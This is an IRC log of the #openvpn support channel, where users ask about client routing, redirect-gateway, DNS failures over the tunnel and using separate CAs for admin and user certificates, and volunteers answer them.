[~andy@141.0.50.105] has joined #openvpn 03:38 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 248 seconds] 03:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 03:51 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 248 seconds] 03:51 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 03:58 -!- Assid [~kvirc@unaffiliated/assid] has joined #openvpn 03:58 < Assid> heya 04:02 -!- Devastator- [~devas@177.18.197.67] has quit [Changing host] 04:02 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 04:02 -!- Devastator- is now known as Devastator 04:05 < Assid> okay so heres something weird.. i have a windows main server.. which has 2 virtual machines .. both which have a public internet ip address.. and are reachable fine.. 1 of which has openvpn working.. perfectly and i can reach it from a static ip (vpn) address.. the other i am unable to . I cant even ping the vpn gateway or from gateway to client either. 04:06 < Assid> i tried with a disabled firewall.. creating the same rules as the other windows box.. nothing works 04:13 <+pekster> Sounds like there's a difference in configuration between the VMs, or maybe between how the host treats them? 04:13 <+pekster> Clearly something has to be different 04:13 < Assid> pekster: cant find anything thats off... 04:14 < Assid> pekster: can i show you on ammy admin / teamviewer what i mean? 
04:14 < Assid> maybe i need a fresh pair of eyeballs on this 04:15 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 04:18 -!- Suterusu1 [~EyeR@host81-156-138-35.range81-156.btcentralplus.com] has joined #openvpn 04:21 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 256 seconds] 04:21 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has joined #openvpn 04:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 276 seconds] 04:37 -!- Suterusu1 [~EyeR@host81-156-138-35.range81-156.btcentralplus.com] has quit [Ping timeout: 256 seconds] 04:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 04:50 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 04:52 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 04:57 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 04:57 -!- genghi [~Adium@p50899732.dip.t-dialin.net] has joined #openvpn 05:09 < genghi> hi… is there a recommended way to have openvpn apply some sort of firewall rules to clients? For example, can we enforce that a connected client can only reach 192.168.0.5 and not 192.1680.6 on the server network side? 
05:14 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-glexqzbkdqwtzqzv] has quit [Ping timeout: 256 seconds] 05:15 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-uxbspexqfkwdnydz] has joined #openvpn 05:22 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 256 seconds] 05:23 -!- Assid [~kvirc@unaffiliated/assid] has quit [Ping timeout: 244 seconds] 05:28 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 05:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 255 seconds] 05:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 05:52 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 256 seconds] 05:53 < dropje> genghi: take a look at --learn-address 05:54 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn 06:01 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 06:01 -!- brute11k [~brute11k@89.249.235.33] has quit [Ping timeout: 240 seconds] 06:01 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Remote host closed the connection] 06:01 -!- brute11k [~brute11k@89.249.235.33] has joined #openvpn 06:03 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn 06:07 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 06:10 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 265 seconds] 06:12 < genghi> dropje: thanks.. 
will do 06:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 244 seconds] 06:40 -!- cosmicgate- [~cosmicgat@198.147.22.172] has joined #openvpn 06:41 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 06:45 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 06:45 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 06:47 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: I'm leaving] 06:54 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 06:56 -!- cosmicgate- is now known as cosmicgate 07:09 < thermoman> let's assume i have 2 vpn servers and some but not all users have to have access to both, others only to one of them 07:10 < thermoman> is it easily manageable that a client-cert for e.g. an admin is accepted at both vpn servers but a client-cert for e.g. a normal user only on one? 07:10 < thermoman> sure i can create a self signed CA etc etc for each server so the admin user ends up with 2 key/crl pairs 07:11 < thermoman> but if this can easily be managed with only one key/crl pair this would be really cool 07:14 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 256 seconds] 07:24 < plaisthos> thermoman: You could use an intermediate ca 07:25 < plaisthos> or add x509 attributes in the certs which you check by a script 07:26 < thermoman> you mean with intermediate ca normal users get their cert signed by the intermediate CA and admins get their cert signed by the root CA? 
07:27 < thermoman> /normal users get their cert signed by one of the intermediate CAs/ 07:28 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 07:28 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 07:29 < thermoman> plaisthos: ^ 07:30 <@ecrist> thermoman: you can use multiple CAs for a single instance of OpenVPN 07:31 <@ecrist> so, you sign admin certs with one CA, user certs with another 07:31 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has quit [Quit: This computer has gone to sleep] 07:32 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 246 seconds] 07:32 < thermoman> sounds complicated 07:33 < thermoman> :) 07:43 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 07:45 -!- cosmicgate [~cosmicgat@198.147.22.172] has quit [Ping timeout: 256 seconds] 07:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 07:49 -!- MarKsaitis [~MarKsaiti@85-189-231-117.v.managedbroadband.co.uk] has joined #openvpn 08:10 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 256 seconds] 08:16 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 240 seconds] 08:21 -!- MarKsaitis [~MarKsaiti@85-189-231-117.v.managedbroadband.co.uk] has quit [Ping timeout: 248 seconds] 08:23 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 08:29 -!- ade_b [~Ade@109.58.126.90.bredband.tre.se] has joined #openvpn 08:29 -!- ade_b [~Ade@109.58.126.90.bredband.tre.se] has quit [Changing host] 08:29 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 08:31 -!- mattock is now known as mattock_afk 08:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 256 seconds] 08:34 -!- mattock_afk is now known as mattock 08:35 -!- genghi [~Adium@p50899732.dip.t-dialin.net] has quit [Read error: Connection reset by peer] 08:46 -!- KaiForce 
[~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has joined #openvpn 08:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 09:02 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has quit [Quit: Leaving] 09:15 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has joined #openvpn 09:21 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 256 seconds] 09:29 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has joined #openvpn 09:31 < thermoman> mhh, i can connect to my openvpn 2.1.3 server from windows vista with openvpn-2.3.0 - connection is fine but no traffic goes over the tunnel 09:31 < thermoman> is there something special with windows vista? 09:31 < thermoman> from linux it works 09:31 < thermoman> i can't even ping the remote end of the tunnel 09:31 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 09:32 < thermoman> windows gives inactivity timeout 09:32 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 09:33 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 255 seconds] 09:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 248 seconds] 09:35 -!- Devastator [~devas@177.18.197.67] has joined #openvpn 09:41 -!- ade_b [~Ade@109.58.126.90.bredband.tre.se] has joined #openvpn 09:41 -!- ade_b [~Ade@109.58.126.90.bredband.tre.se] has quit [Changing host] 09:41 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 09:44 -!- Devastator [~devas@177.18.197.67] has quit [Ping timeout: 252 seconds] 09:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 09:48 -!- Devastator [~devas@177.18.197.67] has joined #openvpn 09:50 < defswork> is there a mac osx openvpn ui client that supports management interface user authentication ? 
09:53 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 256 seconds] 10:02 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:06 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 10:16 -!- Devastator [~devas@177.18.197.67] has quit [] 10:19 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 10:22 -!- master_of_master [~master_of@p57B54741.dip.t-dialin.net] has quit [Ping timeout: 265 seconds] 10:23 -!- master_of_master [~master_of@p57B52A2D.dip.t-dialin.net] has joined #openvpn 10:24 -!- Devastator [~devas@unaffiliated/devastator] has left #openvpn [] 10:24 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 10:25 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn 10:27 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Client Quit] 10:29 -!- glc_ [~gclark@adsl-99-63-81-249.dsl.chcgil.sbcglobal.net] has joined #openvpn 10:31 -!- glc_ [~gclark@adsl-99-63-81-249.dsl.chcgil.sbcglobal.net] has left #openvpn ["Leaving"] 10:31 -!- swat [~swat@ubuntu/member/swat] has quit [Quit: Leaving.] 
10:32 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 260 seconds] 10:32 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 248 seconds] 10:40 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds] 10:44 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 248 seconds] 10:45 -!- Radex [br@debian.pl] has joined #openvpn 10:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 10:47 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 248 seconds] 10:56 -!- Devastator [~devas@177.18.197.67] has joined #openvpn 10:56 -!- Devastator [~devas@177.18.197.67] has quit [Changing host] 10:56 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 10:57 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 10:59 < thermoman> quick question: vpn server's public IP is 1.2.3.4/24 and the vpn server pushes the route 1.2.3.0/24 to the client. 10:59 < thermoman> this works on linux because it sets a host-route to the default gateway 10:59 < thermoman> but not on linux 11:00 < thermoman> can i force windows to set a host-route to its default-gw so the vpn server is still reachable over the public internet while 1.2.3.0/24 is going over the tunnel? 11:01 < thermoman> . 
11:01 < thermoman> found it: http://blog.spamt.net/archives/2006/11/02/mit_openvpn_eine_hostroute_auf_den_client_pushen/index.html 11:02 <@vpnHelper> Title: Push a host route to the client with openvpn (Mit openvpn eine hostroute auf den Client pushen) | Stolzer DNS Spammer (at blog.spamt.net) 11:06 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 11:17 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 248 seconds] 11:33 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 11:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 276 seconds] 11:40 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 11:40 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 248 seconds] 11:46 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 11:46 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 11:46 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 11:49 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 11:54 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 11:57 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.] 
12:00 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has quit [Quit: This computer has gone to sleep] 12:01 -!- Netsplit *.net <-> *.split quits: ade_b 12:02 -!- Netsplit *.net <-> *.split quits: js_, colo-work, cherwin, videl, pnielsen, @novaflash, [Xaronic] 12:02 -!- Netsplit over, joins: cherwin, js_, videl, pnielsen 12:02 -!- novaflash [~novaflash@vpnserver1.jellemaautomatisering.nl] has joined #openvpn 12:02 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 12:02 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 12:02 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 12:02 -!- Netsplit over, joins: [Xaronic] 12:02 -!- Netsplit over, joins: colo-work 12:08 -!- Suterusu1 [~EyeR@host81-156-138-35.range81-156.btcentralplus.com] has joined #openvpn 12:10 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 248 seconds] 12:13 -!- raidz is now known as raidz_away 12:15 -!- exed_ [~maximus@host-88-217-184-122.customer.m-online.net] has joined #openvpn 12:17 -!- raidz_away is now known as raidz 12:18 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has quit [Ping timeout: 276 seconds] 12:19 -!- raidz is now known as raidz_away 12:20 -!- exed_ [~maximus@host-88-217-184-122.customer.m-online.net] has quit [Ping timeout: 248 seconds] 12:21 -!- thermoman [~thermoman@idle.foobar0815.de] has left #openvpn [""If the computer is hidden, hackers can't find it either." Antje Weber, Symantec"] 12:21 -!- raidz_away is now known as raidz 12:26 -!- raidz is now known as raidz_away 12:32 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 246 seconds] 12:34 -!- Suterusu1 [~EyeR@host81-156-138-35.range81-156.btcentralplus.com] has quit [Ping timeout: 264 seconds] 12:45 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 256 seconds] 12:48 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 13:00 -!- raidz_away is now known as raidz 13:08 -!- noize91_ [~noize91@83-65-220-227.hallein.xdsl-line.inode.at] has joined #openvpn 13:16 -!- noize91_ [~noize91@83-65-220-227.hallein.xdsl-line.inode.at] has quit [Remote host closed the connection] 13:16 -!- noize91 [~noize91@046-220-005-168.dyn.orange.at] has joined #openvpn 13:22 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 248 seconds] 13:24 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn 13:26 -!- exed [~maximus@ppp-88-217-68-147.dynamic.mnet-online.de] has joined #openvpn 13:29 -!- noize91_ [~noize91@83-65-220-227.hallein.xdsl-line.inode.at] has joined #openvpn 13:29 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 13:31 -!- exed [~maximus@ppp-88-217-68-147.dynamic.mnet-online.de] has quit [Ping timeout: 248 seconds] 13:31 -!- mattock is now known as mattock_afk 13:33 -!- noize91 [~noize91@046-220-005-168.dyn.orange.at] has quit [Ping timeout: 264 seconds] 13:33 -!- noize91_ is now known as noize91 13:35 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 13:40 -!- exed [~maximus@ppp-88-217-68-147.dynamic.mnet-online.de] has joined #openvpn 13:41 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 13:41 -!- exed [~maximus@ppp-88-217-68-147.dynamic.mnet-online.de] has quit [Client Quit] 13:43 -!- noize91 [~noize91@83-65-220-227.hallein.xdsl-line.inode.at] has quit [Ping timeout: 246 seconds] 13:43 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined 
#openvpn 13:43 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Max SendQ exceeded] 13:44 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 13:44 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Max SendQ exceeded] 13:45 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 13:45 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 256 seconds] 13:46 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 13:46 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Max SendQ exceeded] 13:47 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 13:51 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 264 seconds] 13:57 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has joined #openvpn 13:57 < CrashTM> hey people 13:57 < CrashTM> anyone home? 13:58 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 264 seconds] 14:00 < kunji> There are 163 people in the room, I'm attempting my first install of OpenVPN right now, so I probably can't answer your question, but just post it, don't ask to ask ^_^ 14:07 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 14:10 <@dazo> kunji++ :) 14:10 <@dazo> !ask 14:11 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 14:11 <@dazo> CrashTM: ^^^ 14:11 < CrashTM> well 14:11 < CrashTM> i got my server running 14:11 < CrashTM> i'm able to connect to it yet my traffic is not routed through my vpn 14:13 < CrashTM> anyone? 14:13 <@ecrist> kunji++ 14:14 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection] 14:15 < CrashTM> >.> 14:20 <@krzee> kunji++ 14:20 <@krzee> 3 karma points for a well placed statement! 
14:21 * krzee high 5's kunji 14:21 <@krzee> CrashTM, 14:21 <@krzee> !redirect 14:21 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 14:21 <@vpnHelper> http://ircpimps.org/redirect.png 14:26 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 14:26 < wh1p> crashtm :? 14:26 < CrashTM> ok 14:26 < CrashTM> it is a dns problem 14:26 < CrashTM> i CAN ping 8.8.8.8 but i cannot ping google.com 14:27 <@krzee> well there ya go 14:27 <@krzee> glad to help =] 14:27 * krzee loves those flowcharts! 14:31 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 14:31 <@ecrist> krzee: you should consider rewriting them in graphviz or something editable 14:32 <@ecrist> because they ARE epic 14:32 <@krzee> thanks, not a bad idea… it'll have to wait til after my travels though 14:32 <@krzee> im in vegas right now, headed to all of california 14:32 <@ecrist> nice 14:32 <@krzee> testing 4 different wifi hotspots with my darknet voip service 14:33 <@ecrist> nice 14:33 <@ecrist> how's that project going? 14:33 <@krzee> fantastic 14:33 <@krzee> so far verizon is the best in vegas, but t-mobile is a near second 14:35 <@ecrist> non-LTE, and moving, tmo is best, imho 14:35 <@krzee> i suspect it will vary from area to area, which is why i bought 4 14:35 < kunji> Wow, thanks for the karma, first time that's happened to me on IRC ^_^, small question here, in the sample server.conf files is the function of ";" the same as of "#", that is, is it for a commented line? 
14:36 <@krzee> kunji, yes 14:36 < kunji> krzee: cool, thanks 14:36 <@krzee> np 14:36 < CrashTM> thanks 14:36 <@ecrist> kunji: those are all standard comment delimiters 14:36 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has quit [Quit: Leaving] 14:37 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 248 seconds] 14:51 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 14:51 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 14:51 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 14:53 -!- swat [~swat@ubuntu/member/swat] has quit [Ping timeout: 245 seconds] 15:05 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 276 seconds] 15:06 -!- brute11k [~brute11k@89.249.235.33] has quit [Quit: Leaving.] 15:11 -!- krzee [nobody@openvpn/community/support/krzee] has left #openvpn ["Leaving"] 15:20 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 244 seconds] 15:22 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 15:27 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 240 seconds] 15:30 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 15:43 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 15:52 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 16:05 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 17.0.1/20121128204232]] 16:11 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving] 16:14 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 276 seconds] 16:14 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.225.wb.wifirst.net] has joined #openvpn 16:19 -!- cjs226 
[~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [] 16:24 -!- B4ub [~b4ub@178.73.210.252] has joined #openvpn 16:25 -!- dazo is now known as dazo_afk 16:26 < B4ub> Ohai everybody ! 16:27 < B4ub> I'm using the 443 port (1194 is blocked), but the traffic is completely jammed on this port, which port do you think I can use ? 16:33 -!- moore1 [~moore@50.7.199.107] has joined #openvpn 16:35 < moore1> please i need help on this, i have openvpn server but my clients keeping on getting the same ip from it even after disconnecting and connecting back again 16:35 < moore1> what actually am i missing out to include ? 16:43 -!- B4ub [~b4ub@178.73.210.252] has quit [Remote host closed the connection] 16:46 -!- exed [~maximus@ppp-88-217-68-147.dynamic.mnet-online.de] has joined #openvpn 16:47 -!- exed [~maximus@ppp-88-217-68-147.dynamic.mnet-online.de] has quit [Client Quit] 16:47 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 264 seconds] 16:48 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.225.wb.wifirst.net] has quit [Ping timeout: 264 seconds] 16:50 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 17:02 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 17:13 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 246 seconds] 17:14 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 17:15 -!- bandroidx [~bandroidx@2607:f358:1:fed5:4:0:414:11] has quit [Excess Flood] 17:18 -!- bandroidx [~bandroidx@2607:f358:1:fed5:4:0:414:11] has joined #openvpn 17:20 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 17:20 -!- zoredache [~zoredache@pdpc/supporter/professional/zoredache] has joined #openvpn 17:24 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 252 seconds] 17:27 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has joined #openvpn 17:30 -!- 
moore1 [~moore@50.7.199.107] has quit [Ping timeout: 265 seconds] 17:31 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 276 seconds] 17:32 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 17:32 -!- moore1 [~moore@vs749.rosehosting.com] has joined #openvpn 17:59 -!- moore1 [~moore@vs749.rosehosting.com] has quit [Ping timeout: 248 seconds] 18:00 -!- moore1 [~moore@50.7.199.107] has joined #openvpn 18:20 -!- moore1 [~moore@50.7.199.107] has quit [Ping timeout: 245 seconds] 18:23 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Read error: Connection reset by peer] 18:30 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 18:35 -!- zoredache [~zoredache@pdpc/supporter/professional/zoredache] has quit [Quit: leaving] 18:37 -!- raidz is now known as raidz_away 18:42 -!- mdw [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has quit [Read error: Operation timed out] 18:43 -!- mdw [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has joined #openvpn 18:46 -!- raidz_away is now known as raidz 19:13 < kunji> moore1: Aren't they supposed to get the same ips? Unless you have an extremely short DHCP lease time. That's all I know about it though, I'm not even sure what OpenVPN uses to handle DHCP, let alone where/if you could change the lease time. 19:15 < kunji> Is there an easy way to check that OpenVPN is working correctly if I'm connecting from inside my network? It seems to be working, but I was hoping I could verify it for sure without having to go anywhere :P 19:15 <+pekster> (s)he is gone 19:17 < kunji> pekster: Yeah, whoops, I glanced through and saw a leave and came back, didn't notice the second leaving. 19:26 -!- raidz is now known as raidz_away 19:43 < kunji> Hmm, so I'm trying to send all traffic over the vpn connection. I have set push "redirect-gateway local def1 bypass-dhcp" on the server side, but it seems like my traffic isn't passing through the server. 
At least I don't see any spike in network traffic when watching the system monitor, even when downloading 720p video on YouTube, not really sure where to go from here.
19:46 <+pekster> If you're doing it from inside your network, that's expected behaviour because you still have a link-local route
19:47 < kunji> pekster: Oh, I guess I was thinking that's what the local bit was for, so I guess I'll just need to wait until I actually go elsewhere to try this.
19:47 <+pekster> The redirect-gateway impacts sources you don't have a route for, not local stuff (which always prefers your locally-connected route)
19:48 <+pekster> s/sources/destinations/
19:48 < kunji> pekster: Can I change that on the client side then?
19:48 <+pekster> Change what?
19:49 < kunji> pekster: For it to route everything through the vpn, Ubuntu used to do this, maybe still does, but I'm trying with a Windows client right now and frankly Windows and I don't play nice together with this kind of stuff.
19:50 <+pekster> The redirect-gateway OpenVPN option does the same thing on both OSs
19:51 < kunji> pekster: Right, I was asking if there was something else I could do to make it happen, maybe changing the local routing table?
19:52 <+pekster> What do you mean "make it happen"? If you pass that parameter, it is working. When the client & server are on the same network, it probably won't do what you expect (at least without ugly NAT tricks) because the LAN's default gateway (the real gateway) will just send the return traffic directly back to the client
19:53 <+pekster> Unless you have errors in your log file about failed route commands, the redirect-gateway is doing exactly what it's supposed to
19:58 < kunji> pekster: I'm not saying that it isn't doing what it's supposed to, just that what it's supposed to do isn't what I was hoping to have happen. I want all of my traffic to pass through the vpn, not necessarily when I'm on the same network as now, but at least for when I'm on a different network.
I just need it so that when I'm not on my network, ALL traffic passes through the vpn, I can't have it being ambiguous whether or not my traf
20:00 <+pekster> Okay, you obviously can't have "all" traffic, since the VPN traffic (the encrypted packets) needs to go to the VPN server. And anything on a link-local network won't get redirected either, since that's a smaller (ie: more specific) route. However, everything else will be, as long as the VPN is up. Once it goes down, packets instantly go back to their usual paths
